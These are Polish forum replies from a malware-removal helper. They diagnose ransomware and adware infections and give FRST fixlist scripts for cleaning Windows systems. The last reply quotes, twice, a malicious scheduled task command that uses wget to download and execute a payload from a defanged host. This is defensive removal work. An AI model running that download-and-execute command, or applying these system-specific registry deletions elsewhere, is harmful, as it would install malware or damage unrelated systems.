picasso

Co Ty opowiadasz. Temat jest w dziale Sieci (wyraźnie mówiłam że go tam przenoszę!): https://www.fixitpc.pl/topic/28473-problem-z-traceniem-pakietów-i-wolnym-internetem/ Tu jest dział diagnostyki infekcji, a tematy nie pasujące do tego działu (brak infekcji) są przenoszone do bardziej pasujących działów.

1. Jakoś pominęłam odpadkowy DAEMON Tools Toolbar nadal widoczny na liście. Ostatnia poprawka do FRST: DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DAEMON Tools Toolbar 2. Skasuj FRST i jego logi z folderu C:\Pobieranie. Następnie zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 3. Zaktualizuj systemowy IE8 do wersji IE11, nawet jeśli z niego nie korzystasz. 4. Nie jestem pewna co "łowiła" infekcja. Na wszelki wypadek zmień hasła w ważnych serwisach (bank, poczta, etc).

Jest tu więc jakaś rozbieżność detekcji, albo coś się zmieniło w międzyczasie, bo FRST widzi AutoKMS w Harmonogramie. W związku z tym po prostu zadam do usuwania ten element, wraz z innymi wspominanymi poprawkami. Akcje do przeprowadzenia: 1. Odinstaluj SlimDrivers. Instalacja wygląda na naruszoną (może AdwCleaner coś tam grzebał). 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {91FF2CF2-A6AE-4288-A58E-D56F388AAF3A} - System32\Tasks\SlimDrivers Startup => C:\Program Files\SlimDrivers\SlimDrivers.exe Task: {9FA58E07-9EA9-446E-BB99-70AD30F0051E} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe Task: {AFBEFB4B-F65A-4845-A836-A7A324203D16} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe Task: {B7FE9452-F3C4-4B82-B961-419F0A30898E} - System32\Tasks\JetCleanLoginCheckUpdate => E:\Program Files\BlueSprig\JetClean\AutoUpdate.exe Task: {BE07A5E2-D4A7-4966-A73A-008B31232C0F} - System32\Tasks\JetBoost_AutoUpdate => E:\Program Files\BlueSprig\JetBoost\AutoUpdate.exe Task: {CFFA4BC0-FFC0-465E-ACE9-E6AE7584A19A} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-07-27] () Task: C:\Windows\Tasks\SlimDrivers Startup.job => C:\Program Files\SlimDrivers\SlimDrivers.exe CustomCLSID: HKU\S-1-5-21-988280708-379344645-3364513464-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> Brak ścieżki do pliku CustomCLSID: HKU\S-1-5-21-988280708-379344645-3364513464-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> Brak ścieżki do pliku CustomCLSID: HKU\S-1-5-21-988280708-379344645-3364513464-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> Brak ścieżki do pliku CustomCLSID: HKU\S-1-5-21-988280708-379344645-3364513464-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> Brak ścieżki do pliku HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\AutoKMS Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy po przeprowadzonej operacji AVG nadal coś wykrywa.

Pytanie: czy "puste" pole nazwy użytkownika oznacza celową manipulację wyglądu raportu? Stan systemu jest następujący: owszem, to infekcja CryptoWall 3.0 szyfrująca dane na wszystkich dyskach (tu C i D), plików zaszyfrowanych nie da się odkodować. Co więcej, infekcja jest nadal aktywna, w starcie uruchamiają się szkodliwe moduły. Jestem w stanie usunąć wszystkie wtórnie dodane elementy infekcji, z wyjątkiem odkodowania plików osobistych zaszyfrowanych przez infekcję, tylko jest tu ten problem: Rozumiem, że rodzice słabo się znają na komputerze. Przez telefon nie da się podać instrukcji które mam na myśli, musieliby mieć wgląd do tego tematu i wykonać akcję rozpisaną w poście. Oczywiście format załatwiłby wszystko od ręki. Informatyk nie zdziała więcej niż ja i prawdopodobnie po prostu od razu wykona format, tylko za opłatą. Czy rodzice są w stanie wykonać instrukcje podane w poście lub samodzielnie wykonać format dysku?

Operacja ukończona pomyślnie. Na zakończenie: Zastosuj DelFix, następnie wyczyść foldery Przywracania systemu, oraz zaktualizuj systemowy IE: KLIK.

Wszystko pomyślnie wykonane. Drobne poprawki na szczątki po odinstalowanym Spybocie. Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-227159230-626954009-1044769965-1000\...\Run: [spybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.) HKU\S-1-5-18\...\Run: [spybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.) Task: {5D9E9CBB-5556-4E79-BA73-FFE754F40E40} - System32\Tasks\Spybot - Search & Destroy - Scheduled Task => C:\Spybot - Search & Destroy\SpybotSD.exe DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Safer-Networking RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files\Common Files\AV\Spybot - Search and Destroy Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tymrazem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

W raportach nie widać jawnych oznak infekcji. Oceniając po zgłoszeniach AVG kierujących na plik C:\Windows\Temp\SppExtComObjHook.dll, wygląda na to że AVG wykrywa aktywność cracka aktywacji Office. Masz go w Zaplanowanych zadaniach: Task: {CFFA4BC0-FFC0-465E-ACE9-E6AE7584A19A} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-07-27] () Ten crack będzie wykrywany przez rozmaite skanery. Na początek przeprowadź test, czy wyłączenie tego obiektu spowoduje ustanie zgłoszeń. Uruchom Autoruns, w karcie Scheduled Tasks wyłącz AutoKMS, zresetuj system i podaj czy AVG nadal zgłasza coś. Gdy mi potwierdzisz stan rzeczy, zajmę się innymi rzeczami, tzn. usunięcie odpadkowymch wpisów.

Uprawnienioa są już OK w root dysku. Folder RECYLER został odblokowany, więc czy Kosz działa już jak powinien? Ale z pośpiechu bezmyślnie powielałam własny błąd w komendach Reg (brak zamknięcia cudzysłowiem), więc powtórz to: Reg: reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /s Reg: reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /s Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /s Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /s

Pliki *.ccc to infekcja szyfrująca dane - TeslaCrypt. Niestety nie ma żadnego ratunku dla zaszyfrowanych plików. Dla porównania temat z tą samą infekcją: KLIK. Ale podaj obowiązkowe raporty z FRST i GMER, by można było ocenić czy ta infekcja jest nadal aktywna oraz czy nie ma innych aktywnych zagrożeń.

Proszę dostarcz raporty wymagane działem, czyli FRST i GMER. Logi z przestarzałego OTL nie są tu już brane pod uwagę.

Kończymy: 1. Usuń narzędzia i logi z folderu C:\Users\Dybek\Desktop\fixxx\fix oraz log GMER z Pobranych. 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Wszystko wykonane zgodnie z planem, log końcowy wygląda w porządku. Jeszcze poprawki na odpadki po odinstalowanych programach: Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\ProgramData\Sun RemoveDirectory: C:\Users\Dybek\AppData\Local\Mozilla RemoveDirectory: C:\Users\Dybek\AppData\Roaming\Mozilla Reg: reg delete HKCU\Software\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\mozilla.org /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

Post nadal jest na swoim miejscu: KLIK.

Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. Jak najbardziej. Wolny internet: może ESET Smart Security ma jakiś wpływ. Czarny ekran: w którym miejscu się pojawia, przed logo z Windows, przed ekranem logowania? W Dzienniku zdarzeń widzę takie oto błędy: Dziennik System: ============= Error: (11/12/2015 07:47:23 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Windows Phone IP over USB Transport (IpOverUsbSvc). Error: (11/12/2015 07:47:21 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Usługa Szybka instalacja pakietu Microsoft Office z powodu następującego błędu: %%1053 Error: (11/12/2015 07:47:21 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Usługa Szybka instalacja pakietu Microsoft Office. Czyli te dwie usługi się zawieszają: R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2856632 2015-10-15] (Microsoft Corporation) S2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21744 2015-07-09] (Microsoft Corporation) Sprawdź czy będzie poprawa w procesie uruchamiania systemu, gdy je tymczasowo wyłączysz. Klawisz z flagą Windows + X > Zarządzanie komputerem > Usługi i aplikacje > Usługi > wyszukaj Usługa Szybka instalacja pakietu Microsoft Office i Windows Phone IP over USB Transport > z dwukliku pobierz Właściwości i Typ uruchomienia przestaw na Wyłączony. Zresetuj system.

W raportach widzę: zadanie Harmonogramu wstawione przez adware DNS Unlocker, polityki blokujące coś w Google Chrome, zainfekowane pliki DLL Google Chrome (wymagana reinstalacja przeglądarki od zera) oraz inne śmieci. Operacje do wykonania: 1. Odinstaluj stare wersje: Adobe Reader XI (11.0.12) - Polish, Java 8 Update 11 (64-bit), Java SE Development Kit 8 Update 11 (64-bit), Mozilla Firefox 39.0 (x86 pl). Operacje tyczące Google Chrome: Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Na razie nie instaluj przeglądarki ponownie, gdyż w punkcie 2 będzie doczyszczanie obiektów Google. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia Task: {12D19E6B-C5B3-4D5D-B321-E8BCF83736A3} - System32\Tasks\{BC955C43-B254-43C0-946C-702BA06CDBC7} => pcalua.exe -a C:\Users\Dybek\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=smt Task: {39EC624D-DDE5-4E61-8248-E10C6C6BC1C5} - System32\Tasks\Superclean => c:\programdata\{b50b6641-0a1b-d891-b50b-b66410a19904}\hqghumeaylnlf.exe [2014-08-24] (Super PC Tools Ltd) Task: {D0DAAA2A-F738-4E41-9319-23C658A0E17B} - System32\Tasks\DNSKINGSTON => dnskingston.exe Task: C:\Windows\Tasks\Superclean.job => c:\programdata\{b50b6641-0a1b-d891-b50b-b66410a19904}\hqghumeaylnlf.exe S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X] S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X] S0 mv91xx; system32\DRIVERS\mv91xx.sys [X] CustomCLSID: HKU\S-1-5-21-2760842731-4289578809-4065000478-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Dybek\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay => Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKU\S-1-5-21-2760842731-4289578809-4065000478-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://www.google.com C:\Program Files (x86)\prefs.js C:\Program Files (x86)\Google C:\ProgramData\{b50b6641-0a1b-d891-b50b-b66410a19904} C:\ProgramData\khlkjigicenalebajemnlmpbclndbpfl C:\Users\Dybek\AppData\Local\{7C95BC24-7AAC-4843-920D-93CB50E1C4E5} C:\Users\Dybek\AppData\Local\setup.txt C:\Users\Dybek\AppData\Local\Temp-log.txt C:\Users\Dybek\AppData\Local\Google C:\Users\Dybek\AppData\Roaming\appdataFr3.bin C:\Users\Dybek\AppData\Roaming\appdataFr25.bin Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f CMD: ipconfig /flushdns EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Dybek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy problemy nadal występują.

Tak, to wszystko.

Przeanalizowałam foldery. Nic oczywistego nie widzę, ale już od początku mnie zastanawiało "mało popularne" rozszerzenie Internet traffic economizer, mimo że oficjalnie hostowane w Chrome Web Store. CHR Extension: (Internet traffic economizer) - C:\Users\ryszard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdhmbfholeopafngkafjdljlogobfgmd [2015-11-04] Odinstaluj je i podaj rezultaty czy są pożądane zmiany.

Widać log na dysku, tzn. plik C:\ComboFix.txt. W spoilerze doczyszczanie wpisów odpadkowych, co nie ma związku ze zgłaszanymi problemami. To nie jest problem infekcji. Sugestie wstępne: - Jedyne co w logach widzę, to że Zapora systemu Windows jest wyłączona. Włącz ponownie: Uruchom msconfig, wyszukaj na liście Usługę Zapory systemu Windows (MpsSvc), zaznacz i zresetuj system. - Odinstaluj świeżo doinstalowany cFosSpeed v9.64. Temat przenoszę do działu Sieci. Zasady działu Sieci: KLIK. Jeśli nic z powyższych sugestii nie pomoże, dostarcz te dane. Niestety nie wiem czy ktoś pociągnie temat.

1. AdwCleaner czepia się zadania DriverEasy 4.7.2. Na wszelki wypadek odinstaluj ten program. Takie automaty do aktualizacji sterowników nie są tu zresztą polecane, sterowniki należy precyzyjnie aktualizować ręcznie. 2. Otwórz Notatnik i wklej w nim: DeleteKey: HKCU\Software\InstallCore DeleteKey: HKCU\Software\PRODUCTSETUP DeleteKey: HKCU\Software\Mozilla\Extends DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3} DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5} DeleteKey: HKLM\SOFTWARE\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66} DeleteKey: HKLM\SOFTWARE\istartsurfSoftware DeleteKey: HKLM\SOFTWARE\FFPluginHp DeleteKey: HKLM\SOFTWARE\WdsManPro DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WdsManPro RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\ProgramData\apn RemoveDirectory: C:\Users\Trojanus\AppData\Roaming\OpenCandy RemoveDirectory: C:\Users\Trojanus\Desktop\Stare dane programu Firefox CMD: del /q C:\Users\Trojanus\Desktop\3yjnyeix.exe Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

Temat przenoszę do działu Windows. Log z GMER robiłeś w złych warunkach, co zaciemniło raport, nie wykonany ten punkt: KLIK. A w spoilerze doczyszczanie szczątkowych wpisów, co nie ma znaczenia w kontekście zgłaszanych problemów. Brak tu konkretów, ale nie wykluczony problem sprzętowy. Te obrazki z Blue Screen View mało mówią. Widzę, że masz zainstalowany Debugger Microsoftu, on podaje bardziej szczegółowe dane. Niemniej od razu sugeruję sprawdzić testową deinstalację 360 Total Security - to bardzo inwazyjny soft ładowany przy udziale masy sterowników, może mieć wpływ conajmniej na aspekty zacinania.

Wszystko pomyślnie wykonane. Problem powinien ustąpić. Ale jeszcze poprawki: Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

semiconductor, zasady działu: KLIK. Zakaz podpinania się pod cudze tematy (post zostanie wydzielony w osobny) i brak obowiązkowych logów. 1. Po to są obowiązkowe raporty, które dokładnie pokażą czy są jakieś elementy aktywne i gdzie. 2. Jeśli infekcja nie jest aktywna (a to właśnie nie jest wiadome), nie musisz, najgorsze się bowiem już stało. 3. Nie wiem czy Dysk Google także jest atakowany. Na pewno Dropbox. 4. Instrukcja usuwania / doboru odpowiednich działań zależy od tego jaki jest stan konkretnego systemu. Na razie nie mam żadnych wyobrażeń o tym jaki jest stan Twojego Windowsa. Z pewnością to są te serie fałszywych blogów o usuwaniu malware, których celem głównym jest nakierowanie użytkownika na pobranie reklamowanego tam narzędzia.

Wszystko pomyślnie wykonane. Inne poprawki, w chwili obecnej mało istotne, potem. Zabierz się za odkodowanie plików przy udziale podanego już RakhniDecryptor. Zapewne czytałeś podobny temat na forum, ale ostrzegam na wszelki wypadek: - Narzędzie przeprowadzi atak typu "brute force" na hasło, co oznacza bardzo długą pracę liczoną w godziny a nawet dni. - Podczas tej operacji procesor będzie silnie obciążony przez narzędzie, więc zostawić system w spokoju nie prowadząc żadnych dodatkowych akcji. - Miejsce na dysku będzie "znikać", bo Kaspersky utworzy repliki plików, o ile mu się uda znaleźć hasło. Po ukończeniu procesu zgłoś się tu z wynikami czy odkodowane, czy wszystkie i czy po odkodowaniu pliki działają. Jeśli operacja się powiedzie w 100%, podam skrypt FRST hurtowo usuwający zaszyfrowane kopie z dysków.

W systemie działa infekcja podobna do VBKlip/Banatrix: Task: {10AE26B4-A3E9-4E70-B329-E9BE2629AEE2} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=Y3jnlP7sDo;Counter_Strike_1.6_v23.exe;1437684586 & start cmd /R dat.bmp Ta infekcja manipuluje ze schowkiem, więc pewne objawy mogą się zazębiać, ale nie wszystkie. Na razie usuń infekcję i zobaczymy co z tego wyniknie: 1. Odinstaluj szczątkowe śmieci DAEMON Tools Toolbar, Incredibar Toolbar on IE, vShare.tv plugin 1.3 oraz przestarzały Spybot - Search & Destroy. Jeśli śmieci nie będzie widać, kontynuuj dalej. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {08E9B500-765C-49B8-8A79-AA8A18C6C0BF} - System32\Tasks\{7A4A6E52-80AE-416E-8DD4-038ACFBD66B2} => C:\AVAST Software\Avast\AvastUI.exe Task: {10AE26B4-A3E9-4E70-B329-E9BE2629AEE2} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=Y3jnlP7sDo;Counter_Strike_1.6_v23.exe;1437684586 & start cmd /R dat.bmp Task: {2EBDD549-FA78-4C17-9A95-F09F9CA73C36} - System32\Tasks\e-pity2015_styczen => C:\Program Files\e-file\e-pity2014\Assets\signxml.exe Task: {2FA962EE-C1E9-41B9-B72E-FDC792FE6708} - System32\Tasks\{73FD8A8F-060C-4AAF-92BD-B62C4F9223D5} => pcalua.exe -a F:\CDSETUP.EXE -d F:\ Task: {3B0F575F-B62D-4C6E-A079-D6EA36911DD6} - System32\Tasks\e-pity2013_styczen => C:\Program Files\e-file\e-pity2013\Assets\signxml.exe Task: {5E4C995A-C506-4392-9E66-B2C795D25D86} - System32\Tasks\{EAB91018-14A0-4858-ABBD-60CD613C0720} => pcalua.exe -a "C:\Program Files\InstallShield Installation Information\{8C3727F2-8E37-49E4-820C-03B1677F53B6}\setup.exe" -c -runfromtemp -l0x0009 -removeonly Task: {687091B6-D1F9-4CBF-A341-666E9DF6BB07} - System32\Tasks\{1E57334B-7E41-49EC-AFFE-1B3E069FFBE4} => pcalua.exe -a "C:\Program Files\Common Files\DVDVideoSoft\lib\Uninstall.exe" Task: {91E8FC8B-40C2-4DFC-8AB6-6F934BCDD4C7} - System32\Tasks\e-pity2013_kwiecien => C:\Program Files\e-file\e-pity2013\Assets\signxml.exe Task: {ACB981AF-55E8-4F9B-8650-71CA08F1128F} - System32\Tasks\{F30E8CEC-1395-4794-8170-E4AEB6CFEBF7} => pcalua.exe -a C:\Users\Maciej\Desktop\RegCleaner(dobreprogramy.pl).exe -d C:\Users\Maciej\Desktop Task: {D03AC7C9-2096-408F-A0B1-AD17D9F123E3} - System32\Tasks\{5FAFB038-351B-404D-A0AE-58D3D1A91379} => C:\AVAST Software\Avast\AvastUI.exe Task: {E1E5641B-4E3B-47DD-96F8-4564CB514D89} - System32\Tasks\{929CADC3-B236-42AE-A6F5-4563779DF969} => pcalua.exe -a C:\Pobieranie\Sony_Ericsson_Drivers_3.5.3.0.exe -d "C:\Mozilla Firefox" Task: {EB3FACC2-2AE0-4327-A755-4F7AF2C4B2F0} - System32\Tasks\e-pity2015_kwiecien => C:\Program Files\e-file\e-pity2014\Assets\signxml.exe Task: {F9E7B691-A630-4E30-97A9-B633C665AB79} - System32\Tasks\{49EB771A-4865-44EA-93B4-5B59FABA6457} => pcalua.exe -a C:\Pobieranie\CBuilder6Personal\INSTALL.EXE -d C:\Pobieranie\CBuilder6Personal S3 Cardex; \??\C:\Windows\system32\drivers\TBPANEL.SYS [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X] HKU\S-1-5-21-227159230-626954009-1044769965-1000\...\Run: [AVG-Secure-Search-Update_0913b] => C:\Users\Maciej\AppData\Roaming\AVG 0913b Campaign\AVG-Secure-Search-Update-0913b.exe /PROMPT --mid 841e7423ac6f47d0a35ed154d43bfa55-d1113e44ae21302e57bdbc3bdf4438affb0710ff --CMPID 0913b ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\Maciej\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx => Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}\InprocServer32 -> C:\Users\Maciej\AppData\Local\Google\Update\1.3.21.115\psuser.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Maciej\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-227159230-626954009-1044769965-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}\InprocServer32 -> C:\Users\Maciej\AppData\Local\Google\Update\1.3.21.111\psuser.dll => Brak pliku BootExecute: autocheck autochk * /sync /restart /sync /restart /sync /restartsdnclean.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKU\S-1-5-21-227159230-626954009-1044769965-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab DPF: {CAFEEFAC-0017-0000-0005-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_05-windows-i586.cab DPF: {CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab FF Plugin HKU\S-1-5-21-227159230-626954009-1044769965-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Maciej\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [brak pliku] FF HKLM\...\Firefox\Extensions: [{ACAA314B-EEBA-48e4-AD47-84E31C44796C}] - C:\Program Files\Common Files\DVDVideoSoft\plugins\ff FF HKLM\...\Firefox\Extensions: [pdf_architect_3_conv@pdfarchitect.org] - C:\Program Files\PDF Architect 3\resources\pdfarchitect3firefoxextension CHR StartupUrls: Default -> "hxxp://do-search.com/?type=hp&ts=1430335197&from=cor&uid=ST3500320AS_9QM2ZQMQXXXX9QM2ZQMQ" C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autonomiczny składnik AVG LinkScanner C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVDVideoSoft\Programs\Free YouTube to iPod Converter.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OCCT C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice.org 3.4.1 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QPrinter Bookmaker C:\ProgramData\Microsoft\Windows\Start 